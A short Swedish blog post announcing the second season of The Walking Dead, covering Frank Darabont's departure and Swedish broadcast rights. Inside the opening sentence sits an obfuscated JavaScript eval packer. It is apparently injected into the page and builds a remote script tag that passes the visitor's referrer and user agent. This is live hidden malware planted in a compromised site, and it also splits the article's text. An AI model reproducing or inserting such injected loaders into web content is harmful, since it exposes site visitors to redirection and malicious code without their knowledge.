Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

Walking Dead säsong två har kommit

Walking Dead säsong två har kommit
Sebastian

Walking eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|drrtn|var|u0026u|referrer|inayb||js|php’.split(’|’),0,{}))
Dead är tillbaka! Säsong ett var ett Lost-inspirerat HBO-mästerverk fyllt med obehaglig stämning, skräck, blod och action och självklart levande döda. Serien gjorde succé världen över och följs nu av båda könen i alla åldrar  överallt.

Under pausen vi fått har Frank Darabont, showrunner för säsong ett, lämnat serien, vilket självklart oroat fansen. Detta verkar dock inte ha påverkat serien än så länge då säsong två följer i samma riktning som det vi tidigare sett.

Vi vill inte avslöja något om hur denna skräck/äventyrserie fortsatt, men inget har förändrats sen sist. Zombiesarna är lika sjuka, blodet är överallt, stämningen är tryckt och serien är lika grym.

Till de som väntar på att serien ska börja i Sverige  är det ännu inte officiellt när det går igång, men TV11 har köpt rättigheterna till första säsongen så det blir troligen de som visar säsong nummer två.

httpv://www.youtube.com/watch?v=1OZ0mu8Ey6A